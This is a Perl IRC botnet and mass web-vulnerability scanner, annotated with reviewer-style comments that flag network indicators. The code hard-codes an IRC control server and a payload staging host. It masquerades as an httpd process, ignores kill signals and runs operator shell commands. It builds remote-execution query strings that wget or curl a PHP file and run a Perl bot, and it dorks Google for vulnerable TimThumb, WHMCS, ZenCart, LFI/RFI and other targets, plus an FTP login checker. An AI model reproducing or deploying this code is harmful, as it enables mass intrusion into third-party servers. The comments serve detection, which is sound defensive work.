- #!/usr/bin/perl
- use HTTP::Request;
- use HTTP::Request::Common;
- use HTTP::Request::Common qw(POST);
- use LWP::Simple;
- use LWP 5.64;
- use LWP::UserAgent;
- use Socket;
- use IO::Socket;
- use IO::Socket::INET;
- use IO::Select;
- use MIME::Base64;
- use URI::Escape;
- use Digest::MD5 qw(md5_hex);
- use DBI;
- use DBD::mysql;
- my $datetime = localtime; # captured once at start-up; the CTCP TIME reply later in the file returns this fixed value
- my $fakeproc = "/usr/sbin/httpd"; # name written into $0 further down so the process is listed under a web-server name
- my $ircserver = "scan.no-ip.org"; # default IRC control server (network indicator); replaced by $ARGV[0] when given
- my $ircport = 6667; # default IRC port; replaced by $ARGV[1] when given
- my $nickname = "ath0[".int(rand(100))."]"; # bot nick: fixed prefix plus a random integer 0-99 in brackets
- my $ident = "Sigit"; # username field of the USER registration line
- my $channel = "#or"; # control channel joined after registration; replaced by '#'.$ARGV[3] when given
- my $chanxxx = "#or"; # second channel joined after registration; also receives the "Lapor" scan reports
- my $chaninfo = "#or";
- my $submitchan = "#or";
- my $admin = "ath0"; # operator nick messaged on connect; NOTE(review): isAdmin() is not visible here, presumably it compares against this value
- my $fullname = "[!][scanner] Multi VersioN"; # realname field of the USER line; a fixed string usable as an IRC-traffic signature
- my $rawmsg = $ARGV[4];
- my $msgraw = $ARGV[5];
- my $nob0dy = " [!][scanner] Multi VersioN ";
- my $whmcslogo = " [!] WHMCS <=> ";
- my $thumblogo = " [!] TimThumb <=> ";
- my $zerologo = " [!] zBoarD <=> ";
- my $lfilogo = " [!] Lfi <=> ";
- my $rfilogo = " [!] Rfi <=> ";
- my $xmllogo = " [!] Xml <=> ";
- my $oscologo = " [!]Osco <=> ";
- my $oscosqllogo = " [!] O-Sql <=> ";
- my $e107logo = " [!] E107 <=> ";
- my $ihlogo = " [!] Is-Human <=> ";
- my $zenlogo = " [!] ZenCart <=> ";
- my $rfglogo = " [!] RfG <=> ";
- my $carilogo = " [!] Find <=> ";
- my $whmcscmd = '.whmcs';
- my $thumbcmd = "!tim".int(rand(10));
- my $zerocmd = ".zero";
- my $lficmd = ".lfi";
- my $rficmd = ".rfi";
- my $xmlcmd = ".xml";
- my $e107cmd = ".e107";
- my $zencmd = ".zenc";
- my $ihcmd = ".ishu";
- my $oscocmd = ".osco";
- my $cmdlfi = ".cmdlfi";
- my $cmdxml = ".cmdxml";
- my $cmde107 = ".cmde107";
- my $rfgcmd = ".rfg";
- my $ftpcmd = ".ftp";
- my $spreadMode = 1;
- my $zerowget = 1;
- my $zerolwp = 1;
- my $zerocurl = 1;
- my $gps = 1;
- my $gps2 = 1;
- my $timot = 10;
- my $silentmode = 1;
- my $hostinjector = "flickr.com.lmao2.com"; # payload staging host (network indicator); every URL below is built from it
- my $thumbid = "http://".$hostinjector."/bad.php"; # also probed by the "!respon"/"!id" handlers to test that the staging host is reachable
- my $botdid = "http://".$hostinjector."/load.php";
- my $botxdid = "http://".$hostinjector."/xcrew.php";
- my $thumbshell = uri_escape($thumbid); # percent-encoded form, appended to query strings (e.g. "?src=") elsewhere in the file
- my $md5php = md5_hex($thumbid).".php"; # file names derived from the MD5 hex digest of each staging URL; NOTE(review): presumably the name the file takes on a target, confirm against the code that uses them
- my $md5bot = md5_hex($botdid).".php";
- my $md5botx = md5_hex($botxdid).".php";
- my $botid = uri_escape($botdid);
- my $botxid = uri_escape($botxdid);
- my $injector = "http://".$hostinjector."/bad.txt";
- my $botshell = "http://".$hostinjector."/bot.txt";
- my $subticket = "/submitticket.php?step=2&deptid=1"; # request path; NOTE(review): presumably used by the WHMCS routine, which is not visible here
- my $action = "/data/lobex.php";
- my $wgetdon = "?cmd=wget%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;wget%20;perl%20botis.txt;rm%20botis.txt"; # the next three are percent-encoded "?cmd=" query strings: fetch kekkaishi.php from the staging host (wget, lwp-download, curl), run botis.txt with perl, delete it; the second fetch in each has an empty URL. These strings in web access logs are a detection signature for an attempted infection.
- my $lwpdon = "?cmd=lwp-download%20-a%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;lwp-download%20-a%20;perl%20botis.txt;rm%20botis.txt";
- my $curldon = "?cmd=curl%20-C%20-%20-O%20http%3A%2F%2F".$hostinjector."%2Fkekkaishi.php;curl%20-C%20-%20-O%20;perl%20botis.txt;rm%20botis.txt";
- my $uagent = "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6";
- my $lfdtest = "../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%0000";
- my $jpath = "/wp-includes/error.php?____pgfa=https%253A%252F%252Fwww.google.com%252Fsearch?q=";
- my $jack1 = "http://tema1.simgta.com/lobex.php?q="; #"http://altadelisboa.com".$jpath;
- my $jack2 = "http://tema1.simgta.com/lobex.php?q="; #"http://selectiveretreats.com".$jpath;
- my $jack3 = "http://tema1.simgta.com/lobex.php?q="; #"http://agri-impact.com".$jpath;
- my $jack4 = "http://tema1.simgta.com/lobex.php?q="; #"http://viewwebinars.com".$jpath;
- my $jack5 = "http://tema1.simgta.com/lobex.php?q="; #"http://liftoffconsulting.ca".$jpath;
- my $engine = "JacKAC,JacKAD,JacKAE,JacKAF,JacKAG,JacKAL,JacKAM,JacKAN,JacKAT,JacKAR,JacKAU,JacKBE,JacKHU,JacKOrG,JacKCoM,JacKNeT,JacKPL,JacKIT,JacKID,JacKMY,
- JacKES,JacKUK,JacKUS,JacKJP,JacKKR,JacKDE,JacKDK,JacKCA,JacKBR,JacKRO,JacKRU,JacKNL,JacKInfO,JacKFR,JacKIN,JacKMX,JacKCZ,JacKCL,JacKUA,
- JacKCN,JacKIR,JacKTH,JacKEU,JacKPH,JackIL,JackIM,JacKSI,JacKBIZ,GooGLe,WaLLa,YaHoo,AsK,Bing,OnEt,CLusTy,SaPo,AoL,UoL,LyCos,HotBot,BigLobe,SeZNam";
- $SIG{'INT'} = 'IGNORE'; # INT, HUP, TERM and CHLD are ignored from here on, so the process survives Ctrl-C, hang-up and a plain kill; SIGKILL cannot be ignored
- $SIG{'HUP'} = 'IGNORE';
- $SIG{'TERM'} = 'IGNORE';
- $SIG{'CHLD'} = 'IGNORE'; # NOTE(review): on most Unix systems this also makes the kernel reap the many forked children automatically
- $SIG{'PS'} = 'IGNORE'; # 'PS' is not a standard signal name; NOTE(review): presumably has no effect
- #chdir("/");
- $ircserver = "$ARGV[0]" if $ARGV[0]; # optional command-line overrides: server, port, nick, channel (channel given without the leading '#')
- $ircport = "$ARGV[1]" if $ARGV[1];
- $nickname = "$ARGV[2]" if $ARGV[2];
- $channel = '#'."$ARGV[3]" if $ARGV[3];
- $0 = "$fakeproc"."\0" x 16; # process-name masquerading: the title becomes $fakeproc padded with NUL bytes; when triaging, compare the displayed name with the real executable (a perl interpreter) rather than trusting the listing
- my $pid = fork; # background the bot: the parent exits at once, the child carries on
- exit if $pid;
- die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid); # fork failed
- our %irc_servers; # connection state (host, port, nick, myip) keyed by the stringified socket handle
- our %DCC;
- my $dcc_sel = new IO::Select->new();
- $sel_client = IO::Select->new(); # select set of IRC sockets polled by the main loop (undeclared package global)
- sub sendraw { # Write one newline-terminated line of raw IRC protocol text to a socket.
- if ($#_ == '1') { # $#_ == 1 means two arguments were passed: (socket, text)
- my $socket = $_[0];
- print $socket "$_[1]\n";
- } else { # otherwise the first argument is the text and it goes to the global current socket
- print $IRC_cur_socket "$_[0]\n"; # the print result is not checked, so a dead socket fails silently
- }
- }
- sub connector { # Open a TCP connection to the IRC server and register the bot. Arguments: (nick, host, port).
- my $mynick = $_[0];
- my $ircserver_con = $_[1];
- my $ircport_con = $_[2];
- my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1); # returns 1 when the connection fails; the main loop keeps calling connector while %irc_servers is empty
- if (defined($IRC_socket)) {
- $IRC_cur_socket = $IRC_socket; # becomes the default target for sendraw()
- $IRC_socket->autoflush(1);
- $sel_client->add($IRC_socket); # polled by the main loop through can_read()
- $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con"; # state is keyed by the stringified socket handle
- $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost; # local address of the connection
- nick("$mynick"); # nick() is defined outside this part of the file; presumably sends the NICK command
- sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$fullname"); # IRC registration line: the local IP and the fixed realname both appear on the wire
- sleep(1);}}
- sub parse { # Handle one server line: keep-alive, nick tracking and the post-registration sequence. Argument: the raw IRC line.
- my $servarg = shift;
- if ($servarg =~ /^PING \:(.*)/) { # server keep-alive: echo the token back
- sendraw("PONG :$1");
- }
- elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) { # a nick change; only acted on when it is the bot's own nick
- if (lc($1) eq lc($mynick)) {
- $mynick = $4;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- }
- }
- elsif ($servarg =~ m/^\:(.+?)\s+433/i) { # numeric 433 (nickname in use): retry with a random digit 0-4 appended
- nick($mynick.int(rand(5)));
- }
- elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) { # numeric 001 (welcome): registration completed
- $mynick = $2; # the nick the server actually assigned
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'nome'} = "$1"; # server name taken from the message prefix
- sendraw("MODE $mynick +Bx"); # user modes; NOTE(review): their meaning depends on the IRC daemon, not shown here
- sendraw("NS id qwe123"); # hard-coded services password; NOTE(review): "NS" is presumably the NickServ alias
- sleep(3);
- sendraw("JOIN $channel correct"); # joins with fixed channel keys ("correct", "mejen")
- sendraw("JOIN $chanxxx mejen");
- sleep(1);
- sendraw("PRIVMSG $channel : EhhEemmmm !!!"); # fixed check-in strings; the literals in this branch are usable as network signatures
- sendraw("PRIVMSG $admin :Hi $admin im here !!!");
- }
- }
- my $line_temp;
- while( 1 ) {
- while (!(keys(%irc_servers))) { connector("$nickname", "$ircserver", "$ircport"); }
- select(undef, undef, undef, 0.01);
- delete($irc_servers{''}) if (defined($irc_servers{''}));
- my @ready = $sel_client->can_read(0);
- next unless(@ready);
- foreach $fh (@ready) {
- $IRC_cur_socket = $fh;
- $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
- $nread = sysread($fh, $ircmsg, 4096);
- if ($nread == 0) {
- $sel_client->remove($fh);
- $fh->close;
- delete($irc_servers{$fh});
- }
- @lines = split (/\n/, $ircmsg);
- $ircmsg =~ s/\r\n$//;
- if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
- my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
- if ($path eq $mynick) {
- if ($msg =~ /^ PING (.*) /) {
- sendraw("NOTICE $nick : PING $1 ");
- }
- if ($msg =~ /^ VERSION /) {
- sendraw("NOTICE $nick : VERSION mIRC v6.21 Khaled Mardam-Bey ");
- }
- if ($msg =~ /^ TIME /) {
- sendraw("NOTICE $nick : TIME ".$datetime." ");
- }
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
- sendraw("NICK ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- sendraw($IRC_cur_socket, "PRIVMSG $nick :Fake Process/PID : $fakeproc - $$");
- }
- if (&isAdmin($nick) && $msg !~ /^!/) {
- &shell("$nick","$msg");
- }
- if (&isAdmin($nick) && $msg =~ /^!raw (.+)/) {
- sendraw("$rawmsg $msgraw ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!say (.+)/) {
- sendraw("PRIVMSG $rawmsg ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!act (.+)/) {
- sendraw("PRIVMSG $rawmsg : ACTION ".$1." ");
- }
- if (&isAdmin($nick) && $msg =~ /^!chtcmd\s+(.*) -d/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- $newthumbcmd = $1;
- $thumbcmd = $newthumbcmd;
- &msg("$admin","$thumblogo Scan Command change to $thumbcmd ");
- }}}
- if (&isAdmin($nick) && $msg =~ /^!chzcmd\s+(.*) -d/) {
- $newzerocmd = $1;
- $zerocmd = $newzerocmd;
- &msg("$admin","$zerologo Scan Command change to $zerocmd ");
- }
- if (&isAdmin($nick) && $msg =~ /^!chwcmd\s+(.*) -d/) {
- $newwhmcscmd = $1;
- $whmcscmd = $newwhmcscmd;
- &msg("$admin","$whmcslogo Scan Command change to $whmcscmd ");
- }
- if (&isAdmin($nick) && $msg =~ /^!timot\s+(.*) -d/) {
- $newtimot = $1;
- $timot = $newtimot;
- &msg("$admin"," Get Content TimeOut change to $timot ");
- }
- if (&isAdmin($nick) && $msg =~ /^!chxchan\s+(.+) -d/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- $newchan = $1;
- $chanxxx = $newchan;
- &msg("$admin"," xChan change to $chanxxx ");
- }}}
- }
- else {
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg eq "!part") {
- sendraw("PART $path");
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
- &shell("$path","$1");
- }
- if ($msg=~ /^!silent\s+(.*) -d/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- $smod = $1;
- if ($smod =~ /ON/) { $silentmode = 1; $silentstat = "ON"; }
- elsif ($smod =~ /OFF/) { $silentmode = 0; $silentstat = "OFF"; }
- &msg("$path"," [!]Silent Mode $silentstat !!!!");
- }}}
- if ($msg=~ /^!jackx\s+(.*) -d/) {
- $engmod = $1;
- if ($engmod =~ /ON/) { $gps = 1; $gpsstat = "ACTIVATED"; }
- elsif ($engmod =~ /OFF/) { $gps = 0; $gpsstat = "DEACTIVATED"; }
- &msg("$path","[!]Jack Engine $gpsstat !!!!");
- }
- if ($msg=~ /^!engine\s+(.*) -d/) {
- $engmod = $1;
- if ($engmod =~ /ON/) { $gps2 = 1; $gpsstat = "ACTIVATED"; }
- elsif ($engmod =~ /OFF/) { $gps2 = 0; $gpsstat = "DEACTIVATED"; }
- &msg("$path","[!]Multi Engine $gpsstat !!!!");
- }
- if (&isAdmin($nick) && $msg =~ /^!injector\s+(.*) -d/) {
- $newhostinjector= $1;
- $hostinjector = $newhostinjector;
- &msg("$path"," [ !]Injector change to $hostinjector ");
- }
- if ($msg=~ /^$cmdlfi\s+(.*?)\s+(.*)/){
- my $url = $1.$lfdtest;
- my $cmd = $2;
- &cmdlfi($url,$cmd,$path);
- }
- if ($msg=~ /^$cmdxml\s+(.*?)\s+(.*)/){
- my $url = $1;
- my $cmd = $2;
- &cmdxml($url,$cmd,$path);
- }
- if ($msg=~ /^$cmde107\s+(.*?)\s+(.*)/){
- my $url = $1;
- my $cmd = $2;
- &cmde107($url,$cmd,$path);
- }
- ##################################################################### HELP COMMAND
- if ($msg=~ /^!help/) {
- my $helplogo = " [!]Help <=> ";sleep(3);
- &msg("$path","$helplogo Timthumb Vuln Scan: $thumbcmd [bug] [dork] ");
- &msg("$path","$helplogo RFG Vuln Scan: $rfgcmd [bug] [dork] ");
- &msg("$path","$helplogo RFI Vuln Scan: $rficmd [bug] [dork] ");
- &msg("$path","$helplogo LFI Vuln Scan: $lficmd [bug] [dork] ");
- &msg("$path","$helplogo XML Vuln Scan: $xmlcmd [bug] [dork] ");
- &msg("$path","$helplogo e107 Vuln Scan: $e107cmd [dork] ");
- &msg("$path","$helplogo WHMCS Vuln Scan: $whmcscmd [dork] ");
- &msg("$path","$helplogo ZeroBoard Vuln Scan: $zerocmd [dork] ");
- &msg("$path","$helplogo osCommerce Vuln Scan: $oscocmd [dork] ");
- &msg("$path","$helplogo ZenCart Vuln Scan: $zencmd [dork] ");
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- &msg("$nick"," 6Fake Process/PID : $fakeproc - $$");
- }
- if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
- if (&isFound($thumbid,"GIF89")) {
- &msg("$path"," [!]Injector <=> Ready!!! ");
- } else {
- &msg("$path"," [!]Injector <=> Lost!!! ");
- }
- }
- if ($msg=~/^!bypass/){
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $bystats1 = "";my $bystats2 = "";my $bystats3 = "";my $bystats4 = "";my $bystats5 = "";
- my $cekby1 = &get_content($jack1."byroe");
- if ($cekby1 =~ /byroe\.net/i){ $bystats1 = " Up!!!"; } else { $bystats1 = " Lost!!!"; }
- my $cekby2 = &get_content($jack2."byroe");
- if ($cekby2 =~ /byroe\.net/i){ $bystats2 = " Up!!!"; } else { $bystats2 = " Lost!!!"; }
- my $cekby3 = &get_content($jack3."byroe");
- if ($cekby3 =~ /byroe\.net/i){ $bystats3 = " Up!!!"; } else { $bystats3 = " Lost!!!"; }
- my $cekby4 = &get_content($jack4."byroe");
- if ($cekby4 =~ /byroe\.net/i){ $bystats4 = " Up!!!"; } else { $bystats4 = " Lost!!!"; }
- my $cekby5 = &get_content($jack5."byroe");
- if ($cekby5 =~ /byroe\.net/i){ $bystats5 = " Up!!!"; } else { $bystats5 = " Lost!!!"; }
- &msg("$path","[!]Bypass <=> JacK1=$bystats1 JacK2=$bystats2 JacK3=$bystats3 JacK4=$bystats4 15JacK5=$bystats5 ")
- }}}
- ##################################################################### SCAN
- if ($msg =~ /!cari\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $find = $1;
- &msg($path,"$carilogo Searching $find ");
- &cari($path,$find);
- } exit; }
- }
- if ($msg =~ /^$oscocmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my $dork = $1;
- my $simpan = 'situs.txt';
- if (&isFound($thumbid,"GIF89")) {
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan Oscommerce di $path ");
- &msg("$path","$oscologo Dork <=> $dork ");
- &msg("$path","$oscologo Search Engine <=> Loading ");
- &se_start($path,"apalah",$simpan,$dork,$engine,9);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! "); exit;
- }
- }
- }
- }
- if ($msg =~ /^$lficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- my $simpan = 'situs.txt';
- if (&isFound($thumbid,"GIF89")) {
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan LFI di $path ");
- &msg("$path","$lfilogo Dork <=> $dork ");
- &msg("$path","$lfilogo Bugz <=> $bug ");
- &msg("$path","$lfilogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,3);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! "); exit;
- }
- }
- }
- }
- if ($msg =~ /^$rficmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- my $simpan = 'situs.txt';
- if (&isFound($thumbid,"GIF89")) {
- &msg("$chanxxx"," [!] Lapor <=> $nick lagi scan RFI di $path ");
- &msg("$path","$rfilogo Dork <=> $dork ");
- &msg("$path","$rfilogo Bugz <=> $bug ");
- &msg("$path","$rfilogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,5);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! "); exit;
- }
- }
- }
- }
- if ($msg =~ /^$xmlcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan XML di $path ");
- &msg("$path","$xmllogo Dork <=> $dork ");
- &msg("$path","$xmllogo Bugz <=> $bug ");
- &msg("$path","$xmllogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,6);
- }
- }
- }
- if ($msg =~ /^$thumbcmd\s+(.+?[.php])\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ($1,$2);
- my $simpan = 'situs.txt';
- if ($bug =~ m/^\//){ &msg("$path","[!]Burro tira a barra \/ do comeco :p "); exit; } else {
- if (&isFound($thumbid,"GIF89")) {
- &msg("$chanxxx","[!]Lapor <=> $nick lagi scan TimTHumb di $path ");
- &msg("$path","$thumblogo Dork <=> $dork ");
- &msg("$path","$thumblogo Bugz <=> $bug ");
- &msg("$path","$thumblogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,1);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! "); exit; }
- }
- }
- }
- }
- if ($msg =~ /^$whmcscmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ("cart.php?a=byroe&templatefile=",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan WHMCS di $path ");
- &msg("$path","$whmcslogo Dork <=> $dork ");
- &msg("$path","$whmcslogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,2);
- }
- }
- }
- if ($msg =~ /^$zerocmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if (&isFound($thumbid,"GIF89")) {
- my ($bug,$dork) = ("zboard.php?id=byroe",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan zboard di $path ");
- &msg("$path","$zerologo Dork <=> $dork ");
- &msg("$path","$zerologo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,4);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! ");
- }
- }
- }
- }
- if ($msg =~ /^$e107cmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if (&isFound($thumbid,"GIF89")) {
- my ($bug,$dork) = ("contact.php",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan E107 di $path ");
- &msg("$path","$e107logo Dork <=> $dork ");
- &msg("$path","$e107logo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,7);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! ");
- }
- }
- }
- }
- if ($msg =~ /^$ihcmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- if (&isFound($thumbid,"GIF89")) {
- my ($bug,$dork) = ("wp-content/plugins/is-human/engine.php",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan Is-Human di $path ");
- &msg("$path","$ihlogo Dork <=> $dork ");
- &msg("$path","$ihlogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,8);
- } else {
- &msg("$path","[!]Injector <=> Lost!!! ");
- }
- }
- }
- }
- if ($msg =~ /^$zencmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ("admin/sqlpatch.php/password_forgotten.php?action=execute",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan ZenCart di $path ");
- &msg("$path","$zenlogo Dork <=> $dork ");
- &msg("$path","$zenlogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,10);
- }
- }
- }
- if ($msg =~ /^$rfgcmd\s+(.*)/) {
- if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else {
- my ($bug,$dork) = ("apalah",$1);
- my $simpan = 'situs.txt';
- &msg("$chanxxx","[!] Lapor <=> $nick lagi scan RFG di $path ");
- &msg("$path","$rfglogo Dork <=> $dork ");
- &msg("$path","$rfglogo Search Engine <=> Loading ");
- &se_start($path,$bug,$simpan,$dork,$engine,11);
- }
- }
- }
- if ($msg =~ /^$ftpcmd\s+(.+?)\s+(.*)\s+(.*)/) {
- my $url = $_[0];
- my $host = $_[1];
- my $user = $_[2];
- my $pass = $_[3];
- if (my $pid = fork) {
- waitpid($pid, 0);
- } else {
- if (fork) { exit; } else {
- my ($host,$user,$pass) = ($1,$2,$3);
- &msg("$path","[!]FTP <=> Checking $host | $user:$pass");
- my $success = 1;
- use Net::FTP;
- my $ftp = Net::FTP->new($host, Debug => 0, Timeout => 5);
- $success = 0 if $ftp->login($user,$pass);
- $ftp->quit;
- if ($success == 0) {
- ¬ice("$nick","[FTP] [http://".$host."] [".$user.":".$pass."] Success ");
- } else {
- ¬ice("$nick","[FTP] [http://".$host."] [".$user.":".$pass."] Denied ");
- }
- }
- }
- }
- }
- }
- for(my $c=0; $c<= $#lines; $c++) {
- $line = $lines[$c];
- $line = $line_temp.$line if ($line_temp);
- $line_temp = '';
- $line =~ s/\r$//;
- unless ($c == $#lines) {
- parse("$line");
- } else {
- if ($#lines == 0) {
- parse("$line");
- } elsif ($lines[$c] =~ /\r$/) {
- parse("$line");
- } elsif ($line =~ /^(\S+) NOTICE AUTH :\*\*\*/) {
- parse("$line");
- } else {
- $line_temp = $line;
- }
- }
- }
- }
- }
- ##################################################################################
- sub lobex() { # Collect candidate host/path strings from Google result pages for one search string. Argument: the search string. Returns a list.
- my $dork = $_[0];
- my @targets;
- for (my $st=0; $st<=1000 ; $st+=100){ # eleven result pages: start = 0, 100, ... 1000
- my $engine = "http://www.google.com/search?q=".uri_escape($dork)."&num=100&start=".$st;
- my $browser = &search_engine_query($engine); # helper defined outside this part of the file; presumably returns the page body
- while ($browser =~ m/<a href=\"\/url\?q=http:\/\/([^"]*)\"/g) { # only plain-http result links are matched
- my $target = $1;
- if ($target !~ /google|forum|stackoverflow|php\.net/) { # drop results whose URL contains any of these words
- my @sort = split(/\.php/,$target); # keep only the part before the first ".php"
- push (@targets,$sort[0]);
- }
- }
- }
- return @targets; # duplicates are not removed here
- }
- sub cari() { # Search for sites with lobex(), request each one with the staging URL in "src" and report matches to the channel. Arguments: (channel, search string).
- my $chan = $_[0];
- my $dork = $_[1];
- my $count = 0;
- my @kotor = &lobex($dork); # raw result list
- my @target = &clean(@kotor); # clean() is defined outside this part of the file; presumably de-duplicates
- my $num = scalar(@target); &msg($chan,"$carilogo Total [$num] sites");
- if ($num > 0) {
- foreach my $site(@target) {
- $count++;
- if ($count == $num-1) { # "Finished" is announced one item before the end, and never when there is a single result
- &msg("$chan","$carilogo Finished for $dork ");
- }
- my $test = "http://".$site.".php?src=".$thumbshell; # on the receiving server this is a GET with a percent-encoded external URL in "src", a pattern defenders can look for in access logs
- if (my $pid = fork) { waitpid($pid, 0); } else { # double fork: the grandchild does the request, the intermediate child exits
- if (fork) { exit; } else {
- my $coba = &get_content($test);
- if ($coba =~ /Unable to open image/) { # this error text in the response is treated as the vulnerable marker
- &msg($chan,"$carilogo VulN -> http://".$site.".php ");
- }
- } exit;
- }
- }
- }
- }
- sub type() { # Dispatch one scan job to the routine selected by the numeric $type (1-11). Arguments: (channel, bug path, save file, search string, engine name, type).
- my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
- if ($type == 1){$type=&thumb_exploit($chan,$bug,$simpan,$dork,$engine);} # $type is overwritten with the routine's return value; values outside 1-11 fall through with no action
- elsif ($type == 2){$type=&whmcs_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 3){$type=&lfi_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 4){$type=&zero_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 5){$type=&rfi_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 6){$type=&xml_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 7){$type=&e107_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 8){$type=&ih_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 9){$type=&osco_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 10){$type=&zen_exploit($chan,$bug,$simpan,$dork,$engine);}
- elsif ($type == 11){$type=&rfg_exploit($chan,$bug,$simpan,$dork,$engine);}
- }
- ##################################################################################
- sub se_start() {
- my ($chan,$bug,$simpan,$dork,$engine,$type) = @_;
- if ($gps ==1) {
